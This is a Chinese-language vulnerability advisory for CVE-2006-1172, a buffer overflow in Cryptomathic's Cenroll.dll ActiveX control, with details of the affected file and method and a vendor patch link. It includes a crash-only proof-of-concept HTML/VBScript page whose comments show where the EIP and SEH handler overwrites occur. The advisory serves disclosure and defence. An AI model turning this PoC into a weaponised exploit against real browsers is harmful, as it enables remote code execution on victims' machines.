安全研究

安全漏洞
Cryptomathic ActiveX控件远程溢出漏洞

发布日期:2006-05-05
更新日期:2006-05-05

受影响系统:
Cryptomathic ActiveX Cenroll.dll 1.1.0.0
描述:
BUGTRAQ  ID: 17852
CVE(CAN) ID: CVE-2006-1172

Cryptomathic是丹麦的一家安全加密解决方案供应商。

Cryptomathic所开发的用于密钥管理操作的ActiveX工具对象中存在缓冲区溢出漏洞,攻击者可以创建调用该ActiveX组件的站点或嵌入了HTML页面的邮件。如果用户受骗访问了该站点或邮件的话,就可以导致执行任意指令。

漏洞相关的具体文件为:

有漏洞文件:"C:\Programmer\TDC\CSP\cenroll.dll"
成员名:    "createPKCS10"
progid:    "CENROLLLib.Enroll"



<*来源:Dennis Rand (DER@cowi.dk
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114685608605218&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
  <head>
     <title>CIRT.DK - Cryptomathic ActiveX Buffer Overflow</title>
     <IMG SRC="http://www.cirt.dk/images/logo.jpg">
  </head>
  <body>
    <center>
       <h1>TDC Digital Signature ActiveX Buffer Overflow</h1>

          <h4> (c)2006 by Dennis Rand - CIRT.DK</h4>
         
       The following Proof-of-Concept will make Internet Explorer shutdown, if you are vulnerable.<br>
    </center>
    <br>
    <script>alert('Press "OK" to see if you are vulnerable')</script>  
    <object classid='clsid:6DA9275C-64E5-42A1-879C-D90B5F0DC5B4' id='target' ></object>
    <script language='vbscript'>
       arg1 = String(8, "A")
       arg1 = arg1 + "ABCD"                         ' EIP is overwritten here
       arg1 = arg1 + String(64, "B")
       arg1 = arg1 + "AABB"                          ' Pointer to the next SEH Handler
       arg1 = arg1 + "BBAA"                         ' SE Handler
       arg1 = arg1 + String(700, "C")
       arg2 = "DefaultV"

       target.createPKCS10 arg1 ,arg2
    </script>

    <script>alert('You are secure')</script>  
  </body>
</html>

建议:
厂商补丁:

Cryptomathic
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://opdatering.tdc.dk/csp.exe

浏览次数:3070
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障